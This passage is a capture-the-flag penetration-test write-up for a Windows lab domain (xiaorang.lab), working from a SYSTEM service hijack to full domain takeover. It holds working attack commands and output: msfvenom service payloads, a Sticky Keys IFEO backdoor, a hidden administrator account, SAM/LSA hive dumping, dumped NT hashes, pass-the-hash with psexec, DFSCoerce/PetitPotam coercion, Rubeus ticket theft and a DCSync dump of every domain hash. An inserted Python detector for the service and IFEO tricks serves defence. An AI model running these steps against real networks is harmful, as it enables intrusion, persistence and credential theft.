shift.bat writes the IFEO Debugger value; that is the IFEO hijack itself, but HKLM is not writable by Adrian directly, which is why the service detour is needed;

an msfvenom service executable (evil.exe) runs shift.bat;

the gupdate service's ImagePath is changed to evil.exe, so that the payload runs with SYSTEM privileges;

then restart the service -> evil.exe runs as SYSTEM -> shift.bat runs as SYSTEM -> the Sticky Keys hijack is in place -> triggering Sticky Keys pops a SYSTEM shell.

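A detection-side counterpart to the two registry tricks above, added here as an example and not part of the original writeup: it flags services whose ImagePath points into a user-writable directory (the gupdate hijack) and IFEO Debugger values on the accessibility binaries reachable from the lock screen (the sethc.exe backdoor). The analysis works on plain dicts so it runs anywhere; the two collect_* helpers that read the live registry through the standard-library winreg module only work on Windows and assume read access to HKLM, which is the default. The sample registry values are constructed to mirror the state the writeup produces; the trusted and user-writable directory lists are assumptions suitable for a default install.

```python
import re

# Directories a service binary is normally allowed to live in (lower-case, trailing backslash).
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
# Locations any interactive user can write to; nothing a SYSTEM service runs should start here.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
# Accessibility binaries reachable from the lock/logon screen; a Debugger on them is a classic backdoor.
LOGON_SCREEN_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                         "narrator.exe", "displayswitch.exe", "atbroker.exe"}


def normalize_image_path(image_path):
    """Reduce an ImagePath/Debugger value to the lower-cased executable path:
    expand %SystemRoot%, drop quotes and arguments, resolve \\SystemRoot and relative forms."""
    p = re.sub(r"%systemroot%", lambda m: "C:\\Windows", image_path.strip(), flags=re.I)
    if p.startswith('"'):
        p = p[1:].split('"', 1)[0]            # quoted: everything up to the closing quote
    else:
        p = p.split(" ", 1)[0]                 # unquoted: the first token is the executable
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.lower().startswith("\\systemroot\\"):
        p = "C:\\Windows" + p[len("\\SystemRoot"):]
    elif not re.match(r"[a-zA-Z]:\\", p):
        p = "C:\\Windows\\" + p.lstrip("\\")   # relative, e.g. system32\drivers\foo.sys
    return p.lower()


def service_findings(services):
    """services: {service name: ImagePath}.  Returns [(name, reason)] for suspicious entries."""
    out = []
    for name, image in services.items():
        exe = normalize_image_path(image)
        if exe.startswith(USER_WRITABLE):
            out.append((name, f"ImagePath in a user-writable location: {exe}"))
        elif not exe.startswith(TRUSTED_PREFIXES):
            out.append((name, f"ImagePath outside the trusted directories: {exe}"))
    return out


def ifeo_findings(ifeo):
    """ifeo: {target exe: Debugger value}.  Any Debugger on a logon-screen binary is reported;
    for other targets only a shell or an untrusted location is."""
    out = []
    for target, debugger in ifeo.items():
        dbg = normalize_image_path(debugger)
        if target.lower() in LOGON_SCREEN_BINARIES:
            out.append((target, f"Debugger set on logon-screen binary -> {dbg}"))
        elif dbg.endswith(("\\cmd.exe", "\\powershell.exe")) or not dbg.startswith(TRUSTED_PREFIXES):
            out.append((target, f"suspicious Debugger -> {dbg}"))
    return out


def _collect(winreg, base, value_name):
    """Read value_name from every subkey of HKLM\\base; keys without it are skipped."""
    out = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as sub:
                    out[name] = winreg.QueryValueEx(sub, value_name)[0]
            except OSError:          # no such value under this key (the normal case)
                pass
    return out


def collect_services():
    """Windows only: every service's ImagePath from HKLM (winreg is absent elsewhere)."""
    import winreg
    return _collect(winreg, r"SYSTEM\CurrentControlSet\Services", "ImagePath")


def collect_ifeo():
    """Windows only: every IFEO Debugger value."""
    import winreg
    return _collect(winreg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options", "Debugger")


# Constructed sample mirroring the state the writeup leaves behind.
SAMPLE_SERVICES = {
    "gupdate": r"C:\Users\Adrian\Desktop\evil.exe",                        # hijacked ImagePath
    "gupdatem": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc',
    "wuauserv": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}
SAMPLE_IFEO = {
    "sethc.exe": r"C:\windows\system32\cmd.exe",                          # Sticky Keys backdoor
    "notepad.exe": r"C:\Windows\System32\vsjitdebugger.exe",              # constructed, benign location
}

if __name__ == "__main__":
    for name, reason in service_findings(SAMPLE_SERVICES) + ifeo_findings(SAMPLE_IFEO):
        print(f"[!] {name}: {reason}")
```

On the compromised host, service_findings(collect_services()) and ifeo_findings(collect_ifeo()) return exactly the two entries the attack left behind; the same check run from a clean baseline is what makes a SYSTEM service suddenly starting from C:\Users stand out.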
With SYSTEM, create a user and start an implant

# Create a new user
net user matrix$ Matrix2025! /add
# Add it to the local Administrators group
net localgroup administrators matrix$ /add

# msf handler for the bind_tcp payload started from the SYSTEM shell
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 54525
run

RDP to 172.22.4.45 as the new user and take the flag

proxychains xfreerdp3 /u:matrix$ /p:Matrix2025! /d:WIN19 /v:172.22.4.45 /cert:ignore

Local hash extraction

Alternatively, extract the local hashes from the registry hives and crack or reuse them offline.

Create sacm.bat:

# C:\Users\Adrian\Desktop\sacm.bat
reg save HKLM\SYSTEM C:\Users\Adrian\Desktop\system
reg save HKLM\SAM C:\Users\Adrian\Desktop\sam
reg save HKLM\SECURITY C:\Users\Adrian\Desktop\security

These three commands export the registry hives that hold the local credential material:

  • SYSTEM: system configuration, including the boot key needed to decrypt the SAM
  • SAM: Security Account Manager, the local users' LM/NT hashes
  • SECURITY: LSA secrets (among them the machine account password, which is where the $MACHINE.ACC line below comes from) and cached domain logons

Use msfvenom to build a Windows executable (eviltest.exe) whose only job is to run sacm.bat through cmd.exe. The service detour is needed again because saving these hives requires administrator or SYSTEM rights.

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\sacm.bat" --platform windows -f exe-service > eviltest.exe

From cmd, use the gupdate service to run it as SYSTEM:

# Point the service at the payload
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\eviltest.exe" /f
# Restart the service
sc start gupdate

The three files sam, security and system appear on the desktop; download them.

Parse the exported hives offline with Impacket's secretsdump to get the local users' LM/NT hashes directly:

impacket-secretsdump LOCAL -sam sam -security security -system system

This yields the local Administrator's NT hash; pass it over SMB (pass-the-hash) to get a shell and the flag. The LM half aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password, i.e. LM storage is disabled, so only the NT half is of any use:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:5943c35371c96f19bda7b8e67d041727

Manual modification

Alternatively, RDP in and point the service at the msf payload by editing the registry by hand.

Open the Registry Editor:

Press Win + R, type regedit in the Run box and press Enter;

or, in a Command Prompt (CMD) or PowerShell window, type:

regedit

Once the ImagePath value has been edited this way, restart the service as before.

flag03 and flag04

The tools uploaded from here on must run with administrator privileges to work properly.

Dump the local hashes with hashdump:

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::
xianxin:1004:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::

Next, load kiwi and run creds_all to get the machine account's hash. It shows that the computer account WIN19$ belongs to the XIAORANG domain: the host is domain-joined even though Adrian and Administrator are local accounts.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1
-------- ------ ---- ----
Adrian WIN19 259745cb123a52aa2e693aaacca2db52 428f78bf42693da2f9f4b4ba537c5f101e275607
WIN19$ XIAORANG d400f4760988efc4f5e3cd47538710a9 f58455e831225d6848302094b928beadfaa2bb31
WIN19$ XIAORANG 5943c35371c96f19bda7b8e67d041727 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
matrix$ WIN19 9f12c506328bbee07e9a3f4c1a8fb7de 522a58b4a3f08112273007a218ec89bb7c59bc88

wdigest credentials
===================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Adrian WIN19 (null)
WIN19$ XIAORANG (null)
matrix$ WIN19 (null)

kerberos credentials
====================

Username Domain Password
-------- ------ --------
(null) (null) (null)
Adrian WIN19 (null)
WIN19$ xiaorang.lab f2 1b 81 e5 36 fa 68 dd 1f f6 25 57 7b b0 35 74 79 69 47 fe e8 da e1 b5 ba f8 15 ed b9 65 06 9b 94 e0 8b eb ee 9d d3 3a 47
2a 47 a6 7e f9 ca 49 dd 7f 86 d5 d9 54 1b 11 e1 9d 72 76 e0 18 8a 89 b5 0d 1d d3 e0 60 eb 25 db 5f 49 ac 53 25 3c 2f 79 4
f 84 28 bf 1c 95 22 fc 7f 17 e8 74 95 fc b5 56 b7 ba 70 2a 0b 8c 69 e9 2b 24 34 4e 7e cf ef 78 1f c1 d3 d3 a8 d7 d5 41 63
a2 ac c6 b9 4c ab 51 a4 bd 32 ac 4f a7 c7 25 6c 8c f5 0c 6c 1c ba 03 a4 ea 5b 95 8b 10 51 76 6c ac e4 ac aa 92 f1 27 14 9e
b7 18 5e 92 d5 4d e0 8d 26 5c 9d 21 61 c1 ed 57 25 52 a1 4a a1 dc 5d 31 33 ed 95 3a 0c 94 fe 1a ae 6d 5f d6 b4 a8 df 63 2
2 3e 7a 0a 7f 36 3e ab 46 00 f9 5d 2f 6c be b2 81 4f e6 bd b1 c0 fe 75 fe 09 42 66 09 fc db 28 e0 15 aa f1 fa
WIN19$ xiaorang.lab 3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06
0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 8
4 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92
cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1
0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a
0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
matrix$ WIN19 (null)
win19$ XIAORANG.LAB f2 1b 81 e5 36 fa 68 dd 1f f6 25 57 7b b0 35 74 79 69 47 fe e8 da e1 b5 ba f8 15 ed b9 65 06 9b 94 e0 8b eb ee 9d d3 3a 47
2a 47 a6 7e f9 ca 49 dd 7f 86 d5 d9 54 1b 11 e1 9d 72 76 e0 18 8a 89 b5 0d 1d d3 e0 60 eb 25 db 5f 49 ac 53 25 3c 2f 79 4
f 84 28 bf 1c 95 22 fc 7f 17 e8 74 95 fc b5 56 b7 ba 70 2a 0b 8c 69 e9 2b 24 34 4e 7e cf ef 78 1f c1 d3 d3 a8 d7 d5 41 63
a2 ac c6 b9 4c ab 51 a4 bd 32 ac 4f a7 c7 25 6c 8c f5 0c 6c 1c ba 03 a4 ea 5b 95 8b 10 51 76 6c ac e4 ac aa 92 f1 27 14 9e
b7 18 5e 92 d5 4d e0 8d 26 5c 9d 21 61 c1 ed 57 25 52 a1 4a a1 dc 5d 31 33 ed 95 3a 0c 94 fe 1a ae 6d 5f d6 b4 a8 df 63 2
2 3e 7a 0a 7f 36 3e ab 46 00 f9 5d 2f 6c be b2 81 4f e6 bd b1 c0 fe 75 fe 09 42 66 09 fc db 28 e0 15 aa f1 fa

Note that the only account here that belongs to xiaorang.lab is the machine account WIN19$; the domain phase relies on it. WIN19$ shows up with two NT hashes (the machine account password rotates, and both the current and the previous one are in memory); d400f4760988efc4f5e3cd47538710a9 is the one that authenticates to the domain, as the DCSync output later confirms.

Username  Domain        NTLM                              SHA1
-------- ------ ---- ----
Adrian WIN19 259745cb123a52aa2e693aaacca2db52 428f78bf42693da2f9f4b4ba537c5f101e275607
WIN19$ XIAORANG d400f4760988efc4f5e3cd47538710a9 f58455e831225d6848302094b928beadfaa2bb31
WIN19$ XIAORANG 5943c35371c96f19bda7b8e67d041727 5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
WIN19$ xiaorang.lab d400f4760988efc4f5e3cd47538710a9
matrix$ WIN19 9f12c506328bbee07e9a3f4c1a8fb7de 522a58b4a3f08112273007a218ec89bb7c59bc88

psexec can now be used against 172.22.4.45. Note that Administrator is a local account, not a member of xiaorang.lab, so no domain is given (or the domain is set to "."):

proxychains impacket-psexec Administrator@172.22.4.45 -hashes :ba21c629d9fd56aff10c3e826323e6ab -codec gbk

# or, with metasploit's psexec module
use exploit/windows/smb/psexec
set RHOSTS 172.22.4.45
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:ba21c629d9fd56aff10c3e826323e6ab
set SMBDomain .
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54526
run

If the new user was not created earlier, add it now:

# Create a new user
net user matrix$ Matrix2025! /add
# Add it to the local Administrators group
net localgroup administrators matrix$ /add
# RDP in as the new user
proxychains xfreerdp3 /u:matrix$ /p:Matrix2025! /d:WIN19 /v:172.22.4.45 /cert:ignore

Domain information gathering

bloodhound

Tools for gathering domain information: BloodHound (SharpHound), AdFind.exe or Adinfo.

Use mimikatz pass-the-hash to spawn a terminal that runs under a domain identity (SharpHound only works from a terminal spawned this way by mimikatz, because that process carries WIN19$'s domain credentials and can query the DC; the local accounts cannot):

mimikatz
privilege::debug
sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:d400f4760988efc4f5e3cd47538710a9

SharpHound.exe -c all

BloodHound analysis shows that both WIN19 and DC01 have unconstrained delegation (domain controllers are trusted for delegation by default unless configured otherwise, but here WIN19 has it as well). The next step is to abuse unconstrained delegation.

A complete write-up of delegation attacks in domain penetration: https://zhuanlan.zhihu.com/p/549838653?utm_id=0

There are several ways to coerce authentication: https://forum.butian.net/share/1944

AdFind

Alternatively, upload AdFind.exe and query for computer accounts (samAccountType 805306369) whose userAccountControl has the TRUSTED_FOR_DELEGATION bit (524288 = 0x80000) set, using the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803. The WIN19 machine account comes back as configured for unconstrained delegation (the DC is returned as well, since it has the bit by default):

AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

Unconstrained delegation

With unconstrained delegation on WIN19, any principal that authenticates to a service on WIN19 with Kerberos also sends along a forwardable copy of its TGT, which lsass on WIN19 caches. So if the domain controller can be made to authenticate to WIN19, the DC's machine-account TGT lands in our lsass.

The DC therefore has to be coerced into authenticating, with DFSCoerce: https://github.com/Wh04m1001/DFSCoerce or PetitPotam: https://github.com/topotam/PetitPotam

Upload Rubeus (mind the version; it needs administrator privileges to read tickets out of lsass) and monitor for new TGTs of DC01$:

Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

Trigger the DFS RPC call with DFSCoerce so that the DC authenticates to WIN19:

proxychains python3 dfscoerce.py -u WIN19$ -hashes :d400f4760988efc4f5e3cd47538710a9 -d xiaorang.lab win19 172.22.4.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[-] Connecting to ncacn_np:172.22.4.7[\PIPE\netdfs]
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.7:445 ... OK
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: 'win19\x00'
RootShare: 'test\x00'
ApiFlags: 1
DFSNM SessionError: code: 0x490 - ERROR_NOT_FOUND - Element not found.

# or, with PetitPotam (the hash in this command presumably comes from a different instance of the range; use the WIN19$ hash shown by creds_all)
proxychains python3 PetitPotam.py -u 'WIN19$' -hashes :2c05ad434d747b203a57565194891b38 -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

Back in Rubeus, the DC's TGT has been captured (the ERROR_NOT_FOUND returned by NetrDfsRemoveStdRoot is normal: the DC authenticates to win19 while handling the call, before it reports that the DFS root does not exist):

C:\Users\matrix$>Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: TGT Monitoring
[*] Target user : DC01$
[*] Monitoring every 1 seconds for new TGTs


[*] 2025/8/20 15:26:37 UTC - Found new TGT:

User : DC01$@XIAORANG.LAB
StartTime : 2025/8/20 18:37:26
EndTime : 2025/8/21 4:37:26
RenewTill : 2025/8/27 18:37:26
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :

(Base64EncodedTicket omitted)

[*] Ticket cache size:

Inject the ticket into the current logon session with the following command:

Rubeus.exe ptt /ticket:<Base64EncodedTicket>

Because the DC's machine account has the replication rights that DCSync needs, every hash in the domain can now be pulled directly.

Domain admin hash obtained:

# Does not work from meterpreter: kiwi runs inside the meterpreter process, whose logon session never received the ticket (Rubeus ptt only injects into the logon session of the console it was run from)
kiwi_cmd "privilege::debug"
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
# Works: run mimikatz from the same terminal in which Rubeus ptt was executed
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
C:\Users\matrix$>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 767e06b9c74fd628dd13785006a9092b 514
1105 Aldrich 98ce19dd5ce74f670d230c7b1aa016d0 512
1106 Marcus b91c7cc463735bf0e599a2d0a04df110 512
1112 WIN-3X7U15C2XDM$ c3ddf0ffd17c48e6c40e6eda9c9fbaf7 4096
1113 WIN-YUUAW2QG9MF$ 125d0e9790105be68deb6002690fc91b 4096
1000 DC01$ 5fe1c30795fa9a33a5f28cf3a5cf5e04 532480
500 Administrator 4889f6553239ace1f7c47fa2c619c252 512
1103 FILESERVER$ 3263bd33c8b76b09b059275a487ea908 4096
1104 WIN19$ d400f4760988efc4f5e3cd47538710a9 528384

mimikatz(commandline) # exit
Bye!

Connect to 172.22.4.19 and take flag03.

A domain admin session was found on FILESERVER; it feels like the intended route was to take FILESERVER first, dump the domain admin's password there, and only then take the domain controller?

proxychains impacket-psexec xiaorang/Administrator@172.22.4.19 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec gbk
type C:\Users\Administrator\flag\flag03.txt
. . . . . . . . . . . . . . . . . . .
.+'|=|`+. .+'|=|`+. .+'| .+'|=|`+. .+'|=|`+. .+'|=|`+. .+'|=|`+.=|`+. |`+. .+'|=|`+. .+'|=|`+.
| | `+ | | | `+.| | | | | `+.| | | `+.| | | | | |.+' | | `+.| | | | | | | | | `+ |
| | | | | |=|`. | | | |=|`. | | . | |=| | | | | | | | | | | | | |
| | | | | | `.| | | | | `.| | | |`+. | | | | | | | | | | | | | | | |
| | | | | | . | | . | | . | | `. | | | | | | | | | | | | | | | | |
| | .+ | | | .+'| | | .+'| | | .+'| | | .+ | | | | | | | | | | | | | | | | |
`+.|=|.+' `+.|=|.+' `+.|=|.+' `+.|=|.+' `+.|=|.+' `+.| |..| |.+' |.+' `+.|=|.+' `+.| |.|



flag03: flag{ca959c0c-bc71-4b13-b7d4-98e3f0cd8578}


Here is fileserver.xiaorang.lab, you might find something interesting on this host that can help you!

Connect to the DC and take flag04.

proxychains impacket-psexec xiaorang/Administrator@172.22.4.7 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec gbk
type C:\Users\Administrator\flag\flag04.txt
______ _______ _ _______ _______ _______ __________________ _______ _
( __ \ ( ____ \( \ ( ____ \( ____ \( ___ )\__ __/\__ __/( ___ )( ( /|
| ( \ )| ( \/| ( | ( \/| ( \/| ( ) | ) ( ) ( | ( ) || \ ( |
| | ) || (__ | | | (__ | | | (___) | | | | | | | | || \ | |
| | | || __) | | | __) | | ____ | ___ | | | | | | | | || (\ \) |
| | ) || ( | | | ( | | \_ )| ( ) | | | | | | | | || | \ |
| (__/ )| (____/\| (____/\| (____/\| (___) || ) ( | | | ___) (___| (___) || ) \ |
(______/ (_______/(_______/(_______/(_______)|/ \| )_( \_______/(_______)|/ )_)


Awesome! Now you have taken over the entire domain network.


flag04: flag{d798003d-0c82-4e38-aa1c-dbd024c13dfc}

Author: sangnigege
Published: 2026-04-15
URL: http://example.com/2026/test52/